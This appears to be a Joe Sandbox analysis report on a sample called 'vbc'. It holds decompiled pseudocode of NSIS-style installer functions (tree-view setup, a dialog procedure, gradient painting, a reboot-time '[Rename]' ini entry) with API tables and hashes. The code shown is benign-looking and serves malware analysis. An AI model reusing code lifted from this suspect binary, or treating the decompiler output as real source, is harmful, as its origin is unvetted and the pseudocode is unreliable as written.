									if( *0x434f2c <= 0) {
										L86:
										if( *0x434fbe == 0x400) {
											InvalidateRect(_v8, 0, 1);
										}
										if( *((intOrPtr*)( *0x433edc + 0x10)) != 0) {
											E00404E0F(0x3ff, 0xfffffffb, E00404E27(5));
										}
										goto L90;
									}
									_t292 = _t201 + 8;
									do {
										_t207 =  *((intOrPtr*)(_v36 + _v24 * 4));
										if(_t207 != 0) {
											_t303 =  *_t292;
											_v72 = _t207;
											_v76 = 8;
											if((_t303 & 0x00000001) != 0) {
												_v76 = 9;
												_v60 =  &(_t292[4]);
												_t292[0] = _t292[0] & 0x000000fe;
											}
											if((_t303 & 0x00000040) == 0) {
												_t211 = (_t303 & 0x00000001) + 1;
												if((_t303 & 0x00000010) != 0) {
													_t211 = _t211 + 3;
												}
											} else {
												_t211 = 3;
											}
											_v68 = (_t211 << 0x0000000b | _t303 & 0x00000008) + (_t211 << 0x0000000b | _t303 & 0x00000008) | _t303 & 0x00000020;
											SendMessageW(_v8, 0x1102, (_t303 >> 0x00000005 & 0x00000001) + 1, _v72);
											SendMessageW(_v8, 0x113f, 0,  &_v76);
										}
										_v24 = _v24 + 1;
										_t292 =  &(_t292[0x206]);
									} while (_v24 <  *0x434f2c);
									goto L86;
								} else {
									_t293 = E004012E2( *0x42d260);
									E00401299(_t293);
									_t222 = 0;
									_t301 = 0;
									if(_t293 <= 0) {
										L74:
										SendMessageW(_v12, 0x14e, _t301, 0);
										_a16 = _t293;
										_a8 = 0x420;
										goto L75;
									} else {
										goto L71;
									}
									do {
										L71:
										if( *((intOrPtr*)(_v28 + _t222 * 4)) != 0) {
											_t301 = _t301 + 1;
										}
										_t222 = _t222 + 1;
									} while (_t222 < _t293);
									goto L74;
								}
							}
						}
						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
							goto L93;
						} else {
							_t232 = SendMessageW(_v12, 0x147, 0, 0);
							if(_t232 == 0xffffffff) {
								goto L93;
							}
							_t294 = SendMessageW(_v12, 0x150, _t232, 0);
							if(_t294 == 0xffffffff ||  *((intOrPtr*)(_v28 + _t294 * 4)) == 0) {
								_t294 = 0x20;
							}
							E00401299(_t294);
							SendMessageW(_a4, 0x420, 0, _t294);
							_a12 = _a12 | 0xffffffff;
							_a16 = 0;
							_a8 = 0x40f;
							goto L56;
						}
					}
				} else {
					_v36 = 0;
					_v20 = 2;
					 *0x434f60 = _t291;
					 *0x42d260 = GlobalAlloc(0x40,  *0x434f2c << 2);
					_t258 = LoadImageW( *0x434f00, 0x6e, 0, 0, 0, 0);
					 *0x42d254 =  *0x42d254 | 0xffffffff;
					_t297 = _t258;
					 *0x42d25c = SetWindowLongW(_v8, 0xfffffffc, E00405513);
					_t260 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
					 *0x42d24c = _t260;
					ImageList_AddMasked(_t260, _t297, 0xff00ff);
					SendMessageW(_v8, 0x1109, 2,  *0x42d24c);
					if(SendMessageW(_v8, 0x111c, 0, 0) < 0x10) {
						SendMessageW(_v8, 0x111b, 0x10, 0);
					}
					DeleteObject(_t297);
					_t298 = 0;
					do {
						_t266 =  *((intOrPtr*)(_v28 + _t298 * 4));
						if( *((intOrPtr*)(_v28 + _t298 * 4)) != 0) {
							if(_t298 != 0x20) {
								_v20 = 0;
							}
							SendMessageW(_v12, 0x151, SendMessageW(_v12, 0x143, 0, E0040657A(_t298, 0, _t326, 0, _t266)), _t298);
						}
						_t298 = _t298 + 1;
					} while (_t298 < 0x21);
					_t299 = _a16;
					_push( *((intOrPtr*)(_t299 + 0x30 + _v20 * 4)));
					_push(0x15);
					E00404499(_a4);
					_push( *((intOrPtr*)(_t299 + 0x34 + _v20 * 4)));
					_push(0x16);
					E00404499(_a4);
					_t300 = 0;
					_v16 = 0;
					if( *0x434f2c <= 0) {
						L19:
						SetWindowLongW(_v8, 0xfffffff0, GetWindowLongW(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t319 = _v24 + 8;
						_v32 = _t319;
						do {
							_t278 =  &(_t319[0x10]);
							if( *_t278 != 0) {
								_v64 = _t278;
								_t279 =  *_t319;
								_v88 = _v16;
								_t311 = 0x20;
								_v84 = 0xffff0002;
								_v80 = 0xd;
								_v68 = _t311;
								_v44 = _t300;
								_v72 = _t279 & _t311;
								if((_t279 & 0x00000002) == 0) {
									if((_t279 & 0x00000004) == 0) {
										 *( *0x42d260 + _t300 * 4) = SendMessageW(_v8, 0x1132, 0,  &_v88);
									} else {
										_v16 = SendMessageW(_v8, 0x110a, 3, _v16);
									}
								} else {
									_v80 = 0x4d;
									_v48 = 1;
									_t284 = SendMessageW(_v8, 0x1132, 0,  &_v88);
									_v36 = 1;
									 *( *0x42d260 + _t300 * 4) = _t284;
									_v16 =  *( *0x42d260 + _t300 * 4);
								}
							}
							_t300 = _t300 + 1;
							_t319 =  &(_v32[0x818]);
							_v32 = _t319;
						} while (_t300 <  *0x434f2c);
						if(_v36 != 0) {
							L20:
							if(_v20 != 0) {
								E004044CE(_v8);
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E004044CE(_v12);
								L93:
								return E00404500(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}

0x00404f0d
0x00404f26
0x00404f2b
0x00404f33
0x00404f39
0x00404f4f
0x00404f52
0x0040517d
0x00405184
0x00405198
0x00405186
0x00405188
0x0040518b
0x0040518c
0x00405193
0x00405193
0x004051a4
0x004051b2
0x004051b5
0x004051cb
0x00405240
0x00405243
0x00405245
0x0040524f
0x0040525d
0x0040525d
0x0040525f
0x00405269
0x0040526f
0x00405272
0x00405275
0x00405290
0x00405277
0x00405281
0x00405281
0x00405275
0x00405269
0x00000000
0x00405243
0x004051d0
0x004051db
0x004051e0
0x004051e7
0x004051ec
0x004051f0
0x004051fb
0x004051fb
0x004051ff
0x00405203
0x00405207
0x0040521a
0x00405209
0x00405209
0x00405210
0x00405216
0x00405212
0x00405212
0x00405212
0x00405210
0x0040521e
0x00405220
0x00405233
0x00405236
0x00405239
0x00405239
0x00405203
0x00000000
0x004051f0
0x004051d2
0x004051d9
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00405293
0x00405293
0x0040529a
0x0040530b
0x00405313
0x0040531b
0x0040531b
0x00405324
0x00405326
0x0040532d
0x00405330
0x00405330
0x00405336
0x0040533d
0x00405340
0x00405340
0x00405346
0x0040534c
0x00405352
0x00405352
0x0040535f
0x004054c0
0x004054c7
0x004054e4
0x004054ea
0x004054fc
0x004054fc
0x00000000
0x00405365
0x00405367
0x0040536c
0x00405371
0x00405376
0x00405378
0x00405378
0x00405379
0x0040537a
0x0040537c
0x0040537c
0x00405384
0x004053c5
0x004053c7
0x004053d7
0x004053da
0x004053df
0x004053e6
0x004053e9
0x0040548b
0x00405494
0x0040549c
0x0040549c
0x004054aa
0x004054bb
0x004054bb
0x00000000
0x004054aa
0x004053ef
0x004053f2
0x004053f8
0x004053fd
0x004053ff
0x00405401
0x00405407
0x0040540e
0x00405413
0x0040541a
0x0040541d
0x0040541d
0x00405424
0x00405430
0x00405434
0x00405436
0x00405436
0x00405426
0x00405428
0x00405428
0x00405456
0x00405462
0x00405471
0x00405471
0x00405473
0x00405476
0x0040547f
0x00000000
0x00405386
0x00405391
0x00405394
0x00405399
0x0040539b
0x0040539f
0x004053af
0x004053b9
0x004053bb
0x004053be
0x00000000
0x00000000
0x00000000
0x00000000
0x004053a1
0x004053a1
0x004053a7
0x004053a9
0x004053a9
0x004053aa
0x004053ab
0x00000000
0x004053a1
0x00405384
0x0040535f
0x004052a2
0x00000000
0x004052b8
0x004052c2
0x004052c7
0x00000000
0x00000000
0x004052d9
0x004052de
0x004052ea
0x004052ea
0x004052ec
0x004052fb
0x004052fd
0x00405301
0x00405304
0x00000000
0x00405304
0x004052a2
0x00404f58
0x00404f5d
0x00404f66
0x00404f6d
0x00404f7f
0x00404f8a
0x00404f90
0x00404f9e
0x00404fb2
0x00404fb7
0x00404fc4
0x00404fc9
0x00404fdf
0x00404ff0
0x00404ffd
0x00404ffd
0x00405000
0x00405006
0x00405008
0x0040500b
0x00405010
0x00405015
0x00405017
0x00405017
0x00405037
0x00405037
0x00405039
0x0040503a
0x0040503f
0x00405045
0x00405049
0x0040504e
0x00405056
0x0040505a
0x0040505f
0x00405064
0x0040506c
0x0040506f
0x0040513f
0x00405152
0x00000000
0x00405075
0x00405078
0x0040507b
0x0040507e
0x0040507e
0x00405084
0x0040508d
0x00405090
0x00405094
0x00405097
0x0040509a
0x004050a3
0x004050ac
0x004050af
0x004050b2
0x004050b5
0x004050f3
0x0040511e
0x004050f5
0x00405104
0x00405104
0x004050b7
0x004050ba
0x004050c8
0x004050d2
0x004050da
0x004050e1
0x004050ec
0x004050ec
0x004050b5
0x00405124
0x00405125
0x00405131
0x00405131
0x0040513d
0x00405158
0x0040515b
0x00405178
0x00000000
0x0040515d
0x00405162
0x0040516b
0x004054fe
0x00405510
0x00405510
0x0040515b
0x00000000
0x0040513d
0x0040506f

APIs

GetDlgItem.USER32(?,000003F9), ref: 00404F1E
GetDlgItem.USER32(?,00000408), ref: 00404F29
GlobalAlloc.KERNEL32(00000040,?), ref: 00404F73
LoadImageW.USER32 ref: 00404F8A
SetWindowLongW.USER32 ref: 00404FA3
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404FB7
ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404FC9
SendMessageW.USER32(?,00001109,00000002), ref: 00404FDF
SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404FEB
SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404FFD
DeleteObject.GDI32(00000000), ref: 00405000
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 0040502B
SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405037
SendMessageW.USER32(?,00001132,00000000,?), ref: 004050D2
SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00405102

Part of subcall function 004044CE: SendMessageW.USER32(00000028,?,00000001,004042F9), ref: 004044DC

SendMessageW.USER32(?,00001132,00000000,?), ref: 00405116
GetWindowLongW.USER32(?,000000F0), ref: 00405144
SetWindowLongW.USER32 ref: 00405152
ShowWindow.USER32(?,00000005), ref: 00405162
SendMessageW.USER32(?,00000419,00000000,?), ref: 0040525D
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004052C2
SendMessageW.USER32(?,00000150,00000000,00000000), ref: 004052D7
SendMessageW.USER32(?,00000420,00000000,00000020), ref: 004052FB
SendMessageW.USER32(?,00000200,00000000,00000000), ref: 0040531B
ImageList_Destroy.COMCTL32(?), ref: 00405330
GlobalFree.KERNEL32(?), ref: 00405340
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004053B9
SendMessageW.USER32(?,00001102,?,?), ref: 00405462
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405471
InvalidateRect.USER32(?,00000000,00000001), ref: 0040549C
ShowWindow.USER32(?,00000000), ref: 004054EA
GetDlgItem.USER32(?,000003FE), ref: 004054F5
ShowWindow.USER32(00000000), ref: 004054FC

Strings

M, xrefs: 004050BA
, xrefs: 004054D4
N, xrefs: 0040519B

Memory Dump Source

Source File: 00000009.00000002.722207746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.722202537.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722213035.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722216855.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722228852.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722232496.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722288315.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722296361.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_vbc.jbxd

Similarity

API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 2564846305-813528018
Opcode ID: 749bdf8e43bd841ecb3e5c95033ce80d775c45143b483fe0b3b59f6494973967
Instruction ID: 669472b6e39b4296dbb294a81ed98d86f32f22d8abeb4cff7518c6a892085abf
Opcode Fuzzy Hash: 749bdf8e43bd841ecb3e5c95033ce80d775c45143b483fe0b3b59f6494973967
Instruction Fuzzy Hash: EF028A70900608EFDB20DFA9DD45AAF7BB5FB84314F10817AE610BA2E0D7799942DF58

Uniqueness

Uniqueness Score: -1.00%

Function 00404658 Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 204
windowstringCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E00404658(struct HWND__* _a4, int _a8, unsigned int _a12, WCHAR* _a16) {
				intOrPtr _v8;
				int _v12;
				void* _v16;
				struct HWND__* _t56;
				intOrPtr _t69;
				signed int _t75;
				signed short* _t76;
				signed short* _t78;
				long _t92;
				int _t103;
				signed int _t110;
				intOrPtr _t113;
				WCHAR* _t114;
				signed int* _t116;
				WCHAR* _t117;
				struct HWND__* _t118;

				if(_a8 != 0x110) {
					if(_a8 != 0x111) {
						L13:
						if(_a8 != 0x4e) {
							if(_a8 == 0x40b) {
								 *0x42b234 =  *0x42b234 + 1;
							}
							L27:
							_t114 = _a16;
							L28:
							return E00404500(_a8, _a12, _t114);
						}
						_t56 = GetDlgItem(_a4, 0x3e8);
						_t114 = _a16;
						if( *((intOrPtr*)(_t114 + 8)) == 0x70b &&  *((intOrPtr*)(_t114 + 0xc)) == 0x201) {
							_t103 =  *((intOrPtr*)(_t114 + 0x1c));
							_t113 =  *((intOrPtr*)(_t114 + 0x18));
							_v12 = _t103;
							_v16 = _t113;
							_v8 = 0x432ea0;
							if(_t103 - _t113 < 0x800) {
								SendMessageW(_t56, 0x44b, 0,  &_v16);
								SetCursor(LoadCursorW(0, 0x7f02));
								_push(1);
								E00404907(_a4, _v8);
								SetCursor(LoadCursorW(0, 0x7f00));
								_t114 = _a16;
							}
						}
						if( *((intOrPtr*)(_t114 + 8)) != 0x700 ||  *((intOrPtr*)(_t114 + 0xc)) != 0x100) {
							goto L28;
						} else {
							if( *((intOrPtr*)(_t114 + 0x10)) == 0xd) {
								SendMessageW( *0x434f08, 0x111, 1, 0);
							}
							if( *((intOrPtr*)(_t114 + 0x10)) == 0x1b) {
								SendMessageW( *0x434f08, 0x10, 0, 0);
							}
							return 1;
						}
					}
					if(_a12 >> 0x10 != 0 ||  *0x42b234 != 0) {
						goto L27;
					} else {
						_t69 =  *0x42c240; // 0x2916a4
						_t29 = _t69 + 0x14; // 0x2916b8
						_t116 = _t29;
						if(( *_t116 & 0x00000020) == 0) {
							goto L27;
						}
						 *_t116 =  *_t116 & 0xfffffffe | SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
						E004044BB(SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
						E004048E3();
						goto L13;
					}
				}
				_t117 = _a16;
				_t75 =  *(_t117 + 0x30);
				if(_t75 < 0) {
					_t75 =  *( *0x433edc - 4 + _t75 * 4);
				}
				_t76 =  *0x434f38 + _t75 * 2;
				_t110 =  *_t76 & 0x0000ffff;
				_a8 = _t110;
				_t78 =  &(_t76[1]);
				_a16 = _t78;
				_v16 = _t78;
				_v12 = 0;
				_v8 = E00404609;
				if(_t110 != 2) {
					_v8 = E004045CF;
				}
				_push( *((intOrPtr*)(_t117 + 0x34)));
				_push(0x22);
				E00404499(_a4);
				_push( *((intOrPtr*)(_t117 + 0x38)));
				_push(0x23);
				E00404499(_a4);
				CheckDlgButton(_a4, (0 | ( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
				E004044BB( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001);
				_t118 = GetDlgItem(_a4, 0x3e8);
				E004044CE(_t118);
				SendMessageW(_t118, 0x45b, 1, 0);
				_t92 =  *( *0x434f10 + 0x68);
				if(_t92 < 0) {
					_t92 = GetSysColor( ~_t92);
				}
				SendMessageW(_t118, 0x443, 0, _t92);
				SendMessageW(_t118, 0x445, 0, 0x4010000);
				SendMessageW(_t118, 0x435, 0, lstrlenW(_a16));
				 *0x42b234 = 0;
				SendMessageW(_t118, 0x449, _a8,  &_v16);
				 *0x42b234 = 0;
				return 0;
			}

0x0040466a
0x00404797
0x004047f4
0x004047f8
0x004048c5
0x004048c7
0x004048c7
0x004048cd
0x004048cd
0x004048d0
0x00000000
0x004048d7
0x00404806
0x0040480c
0x00404816
0x00404821
0x00404824
0x00404827
0x00404832
0x00404835
0x0040483c
0x00404849
0x0040485a
0x00404860
0x00404868
0x00404876
0x0040487c
0x0040487c
0x0040483c
0x00404886
0x00000000
0x00404891
0x00404895
0x004048a5
0x004048a5
0x004048ab
0x004048b7
0x004048b7
0x00000000
0x004048bb
0x00404886
0x004047a2
0x00000000
0x004047b4
0x004047b4
0x004047b9
0x004047b9
0x004047bf
0x00000000
0x00000000
0x004047e8
0x004047ea
0x004047ef
0x00000000
0x004047ef
0x004047a2
0x00404670
0x00404673
0x00404678
0x00404689
0x00404689
0x00404691
0x00404694
0x00404698
0x0040469b
0x0040469f
0x004046a2
0x004046a5
0x004046a8
0x004046af
0x004046b1
0x004046b1
0x004046bb
0x004046c8
0x004046d2
0x004046d7
0x004046da
0x004046df
0x004046f6
0x004046fd
0x00404710
0x00404713
0x00404727
0x0040472e
0x00404733
0x00404738
0x00404738
0x00404746
0x00404754
0x00404766
0x0040476b
0x0040477b
0x0040477d
0x00000000

APIs

CheckDlgButton.USER32 ref: 004046F6
GetDlgItem.USER32(?,000003E8), ref: 0040470A
SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404727
GetSysColor.USER32 ref: 00404738
SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404746
SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 00404754
lstrlenW.KERNEL32(?), ref: 00404759
SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404766
SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040477B
GetDlgItem.USER32(?,0000040A), ref: 004047D4
SendMessageW.USER32(00000000), ref: 004047DB
GetDlgItem.USER32(?,000003E8), ref: 00404806
SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404849
LoadCursorW.USER32 ref: 00404857
SetCursor.USER32(00000000), ref: 0040485A
LoadCursorW.USER32 ref: 00404873
SetCursor.USER32(00000000), ref: 00404876
SendMessageW.USER32(00000111,00000001,00000000), ref: 004048A5
SendMessageW.USER32(00000010,00000000,00000000), ref: 004048B7

Strings

Call, xrefs: 00404835
N, xrefs: 004047F4

Memory Dump Source

Source File: 00000009.00000002.722207746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.722202537.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722213035.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722216855.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722228852.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722232496.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722288315.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722296361.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_vbc.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
String ID: Call$N
API String ID: 3103080414-3438112850
Opcode ID: ce357ac6e0fd4f2b4f67e04795876aef6a46bd5fea1783cb4cf669a44dc9f0f8
Instruction ID: e0aa441e67ff77812dea5cfa76c138b5706349c0d06c8e95e02877fce1cb63d1
Opcode Fuzzy Hash: ce357ac6e0fd4f2b4f67e04795876aef6a46bd5fea1783cb4cf669a44dc9f0f8
Instruction Fuzzy Hash: 1A61A3B5900209BFDB10AF60DD85E6A7BA9FB44314F00843AFB05B62D0D778A951DF98

Uniqueness

Uniqueness Score: -1.00%

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x434f10;
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectW( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextW(_t128, 0x433f00, 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					 *((intOrPtr*)(_t102 + 4)) =  *0x434f08;
				}
				return DefWindowProcW(_a4, _a8, _a12, _t102);
			}

0x0040100a
0x00401039
0x00401047
0x0040104d
0x00401051
0x0040105b
0x00401061
0x00401064
0x004010f3
0x00401089
0x0040108c
0x004010a6
0x004010bd
0x004010cc
0x004010cf
0x004010d5
0x004010d9
0x004010e4
0x004010ed
0x004010ef
0x004010ef
0x00401100
0x00401105
0x0040110d
0x00401110
0x00401112
0x00401118
0x0040111f
0x00401126
0x00401130
0x00401142
0x00401156
0x00401160
0x00401165
0x00401165
0x00401110
0x0040116e
0x00000000
0x00401178
0x00401010
0x00401013
0x00401015
0x0040101f
0x0040101f
0x00000000

APIs

DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32 ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32(00000000,?,00000000), ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectW.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,00000001), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextW.USER32(00000000,00433F00,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000009.00000002.722207746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.722202537.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722213035.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722216855.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722228852.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722232496.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722288315.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722296361.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_vbc.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: 15a6b7738402934ac822911e252168026e8f0364f08849f6e110b85e8bc9718e
Instruction ID: e457e53e67a16f607b198c8be77aa7e47a8fd9e6aa67a1a07366d16d1d2d9a76
Opcode Fuzzy Hash: 15a6b7738402934ac822911e252168026e8f0364f08849f6e110b85e8bc9718e
Instruction Fuzzy Hash: 0E418B71800209AFCF058FA5DE459AF7FB9FF44315F04802AF991AA1A0C738AA55DFA4

Uniqueness

Uniqueness Score: -1.00%

Function 00406183 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 130
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406183(void* __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t12;
				long _t24;
				char* _t31;
				int _t37;
				void* _t38;
				intOrPtr* _t39;
				long _t42;
				WCHAR* _t44;
				void* _t46;
				void* _t48;
				void* _t49;
				void* _t52;
				void* _t53;

				_t38 = __ecx;
				_t44 =  *(_t52 + 0x14);
				 *0x430908 = 0x55004e;
				 *0x43090c = 0x4c;
				if(_t44 == 0) {
					L3:
					_t12 = GetShortPathNameW( *(_t52 + 0x1c), 0x431108, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						_t37 = wsprintfA(0x430508, "%ls=%ls\r\n", 0x430908, 0x431108);
						_t53 = _t52 + 0x10;
						E0040657A(_t37, 0x400, 0x431108, 0x431108,  *((intOrPtr*)( *0x434f10 + 0x128)));
						_t12 = E0040602D(0x431108, 0xc0000000, 4);
						_t48 = _t12;
						 *(_t53 + 0x18) = _t48;
						if(_t48 != 0xffffffff) {
							_t42 = GetFileSize(_t48, 0);
							_t6 = _t37 + 0xa; // 0xa
							_t46 = GlobalAlloc(0x40, _t42 + _t6);
							if(_t46 == 0 || E004060B0(_t48, _t46, _t42) == 0) {
								L18:
								return CloseHandle(_t48);
							} else {
								if(E00405F92(_t38, _t46, "[Rename]\r\n") != 0) {
									_t49 = E00405F92(_t38, _t21 + 0xa, "\n[");
									if(_t49 == 0) {
										_t48 =  *(_t53 + 0x18);
										L16:
										_t24 = _t42;
										L17:
										E00405FE8(_t24 + _t46, 0x430508, _t37);
										SetFilePointer(_t48, 0, 0, 0);
										E004060DF(_t48, _t46, _t42 + _t37);
										GlobalFree(_t46);
										goto L18;
									}
									_t39 = _t46 + _t42;
									_t31 = _t39 + _t37;
									while(_t39 > _t49) {
										 *_t31 =  *_t39;
										_t31 = _t31 - 1;
										_t39 = _t39 - 1;
									}
									_t24 = _t49 - _t46 + 1;
									_t48 =  *(_t53 + 0x18);
									goto L17;
								}
								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
								_t42 = _t42 + 0xa;
								goto L16;
							}
						}
					}
				} else {
					CloseHandle(E0040602D(_t44, 0, 1));
					_t12 = GetShortPathNameW(_t44, 0x430908, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						goto L3;
					}
				}
				return _t12;
			}

0x00406183
0x0040618c
0x00406193
0x0040619d
0x004061b1
0x004061d9
0x004061e4
0x004061e8
0x00406208
0x0040620f
0x00406219
0x00406226
0x0040622b
0x00406230
0x00406234
0x00406243
0x00406245
0x00406252
0x00406256
0x004062f1
0x00000000
0x0040626c
0x00406279
0x0040629d
0x004062a1
0x004062c0
0x004062c4
0x004062c4
0x004062c6
0x004062cf
0x004062da
0x004062e5
0x004062eb
0x00000000
0x004062eb
0x004062a3
0x004062a6
0x004062b1
0x004062ad
0x004062af
0x004062b0
0x004062b0
0x004062b8
0x004062ba
0x00000000
0x004062ba
0x00406284
0x0040628a
0x00000000
0x0040628a
0x00406256
0x00406234
0x004061b3
0x004061be
0x004061c7
0x004061cb
0x00000000
0x00000000
0x004061cb
0x004062fc

APIs

CloseHandle.KERNEL32(00000000), ref: 004061BE
GetShortPathNameW.KERNEL32 ref: 004061C7

Part of subcall function 00405F92: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FA2
Part of subcall function 00405F92: lstrlenA.KERNEL32(00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD4

GetShortPathNameW.KERNEL32 ref: 004061E4
wsprintfA.USER32 ref: 00406202
GetFileSize.KERNEL32(00000000,00000000,00431108,C0000000,00000004,00431108,?,?,?,?,?), ref: 0040623D
GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 0040624C
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406284
